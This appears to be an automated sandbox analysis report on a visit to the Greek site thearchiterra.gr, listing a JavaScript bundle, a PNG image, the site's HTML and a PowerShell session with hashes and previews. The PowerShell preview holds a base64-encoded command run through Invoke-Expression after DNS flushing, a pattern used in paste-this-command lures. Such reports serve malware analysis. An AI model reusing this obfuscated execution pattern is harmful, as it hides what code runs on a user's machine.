                                Preview:!function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)n.d(r,i,function(e){return t[e]}.bind(null,i));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=1)}([function(t,e){t.exports=jQuery},function(t,e,n){n(2),n(6),t.exports=n(4)},function(t,e,n
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 480 x 246, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):12009
                                Entropy (8bit):7.831883302676164
                                Encrypted:false
                                SSDEEP:
                                MD5:88A255FF971DE22F0FE1B9B9AF836CB8
                                SHA1:CC2B4F3D3B1FEF8E4FA6948599362814F7A3F07C
                                SHA-256:B065989314AE73D657C2A99AB67B26D685EB35A6A9F9EFE6DC367CE4F8D9F82E
                                SHA-512:A4F4194A79C834A59461CC040657954A6C01E3F2280DE99879A1411F29A6083AD3FD78EF84634B722C2B75A89B27BB8F715D694EF448256BB6F801A0BBD790A5
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR..............,T.....sRGB.........pHYs..,K..,K..=......iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2022-04-15</Attrib:Created>. <Attrib:ExtId>cd99321c-08d9-4517-9576-d2b88a9538ee</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>. <pdf:Author>The Creatives</pdf:Author>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreatorTool>Canva</xmp:CreatorTool>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (8856)
                                Category:downloaded
                                Size (bytes):127899
                                Entropy (8bit):5.379132652804081
                                Encrypted:false
                                SSDEEP:
                                MD5:FE82ACF4BBF43C02FBD227DCBE7BBAE5
                                SHA1:57E9D90D9DDBAEB0B3164CC18E7574956FD25E1C
                                SHA-256:066046446CED93BCCDA31819EE11BDE978E6A99B230B54FE008EBDAEA98975C5
                                SHA-512:47805AAE534891C922CA1781329FD67CD5BC44F905D9E3F48482F33E53A225694C91DF172B4DC00A4EB38A177D8DBD424110C1635B47396115724787BF9AD358
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/
                                Preview:<!DOCTYPE html>.<html lang="en-US">.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">...<title>www.thearchiterra.gr &#8211; thearchiterra.gr</title>.<meta name='robots' content='max-image-preview:large' />.<link rel='dns-prefetch' href='//fonts.googleapis.com' />.<link rel="alternate" type="application/rss+xml" title="www.thearchiterra.gr &raquo; Feed" href="https://thearchiterra.gr/feed/" />.<link rel="alternate" type="application/rss+xml" title="www.thearchiterra.gr &raquo; Comments Feed" href="https://thearchiterra.gr/comments/feed/" />.<script type="text/javascript">./* <![CDATA[ */.window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/thearchiterra.gr\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}};./*! This file is auto-generated */.!fun
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with very long lines (4281), with no line terminators, with escape sequences
                                Category:dropped
                                Size (bytes):4281
                                Entropy (8bit):5.1925213356449325
                                Encrypted:false
                                SSDEEP:
                                MD5:85F78B60848F886ABF285B7AEC3C0D1D
                                SHA1:754EF5E0E8E1D3D6DB0A02B19878010D10FDBD14
                                SHA-256:414968B8A0DFF328FF535FD99430D475CFF1B49A1887A16EC15101CDFB49D3B2
                                SHA-512:D5F043B0BAA4D73932D22B4365C38A88933FCFF252CAEF8E60EDA60928629C0B1226A0CDF52E552F3732DAD6329102A9FE08B962133B31F637AA8A11381FBCBF
                                Malicious:false
                                Reputation:unknown
                                Preview:.[93mi.[33m.[45m.[0m.[93mipconfig.[33m.[45m .[33m/flush.[33m.[45m.[0m.[93mipconfig.[33m.[45m .[33m/flushdns.[33m.[45m.[0m.[33m.[45m.[0m.[92m$D.[33m.[45m.[0m.[91m> .[0m.[92m$Diagnostics.[33m.[45m .[90m=.[33m.[45m .[36m"U2.[33m.[45m.[0m.[92m$Diagnostics.[33m.[45m .[90m=.[33m.[45m .[36m"U2V0LUNsaXBib2Fy.[33m.[45m.[0m.[92m$Diagnostics.[33m.[45m .[90m=.[33m.[45m .[36m"U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAi.[33m.[45m.[0m.[33m.[45m> .[0m.[92m$Diagnostics.[33m.[45m .[90m=.[33m.[45m .[36m"U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==".[33m;.[0m.[93m$.[33m.[45m.[0m.[91m> .[0m.[92m$MUI.[33m.[45m .[90m=.[33m.[45m .[33m[.[37mSystem.Text.Encoding.[33m]::.[97mUTF8.[33m..[97mGetString.[33m([.[37mSystem.Convert.[33m]::.[97mFromBase64String.[33m(.[93m$.[33m.[45m.[0m.[33m.[45m> .[0m.[92m$MUI.[33m.[45m .[90m=.[33m.[45m .[33m[.[37mSystem.Text.Encoding.[33m]::.[97mUTF8.[33m..[97mGetString.[33m([.[37mSystem.Convert.[33m]::.[97mFromBase64String.[33m(.[92m$Diagnostics.[33m));.[0m.[93mInvoke-Expression.[33m.[45m .[92m$MUI.[33
                                No static file info